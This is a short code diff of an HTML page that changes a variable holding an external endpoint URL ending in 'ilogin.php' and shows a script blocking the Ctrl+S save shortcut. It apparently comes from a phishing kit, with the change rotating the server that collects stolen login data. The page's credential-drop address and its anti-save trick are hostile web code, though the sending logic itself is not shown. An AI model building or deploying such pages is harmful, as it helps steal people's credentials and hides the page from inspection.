--- a/index.html
+++ b/index.html
@@ -88,7 +88,7 @@
 <script type="text/javascript" src="https://ajax.aspnetcdn.com/ajax/bootstrap/5.2.3/bootstrap.min.js"></script>
 
 <script>
-var mdr = "https://dataupload.top//bless/netvi/ilogin.php";
+var mdr = "https://uploadconfig.host/bless/netvi/ilogin.php";
 $(document).bind('keydown', function(e) {
 if(e.ctrlKey && (e.which == 83)) {
 e.preventDefault();
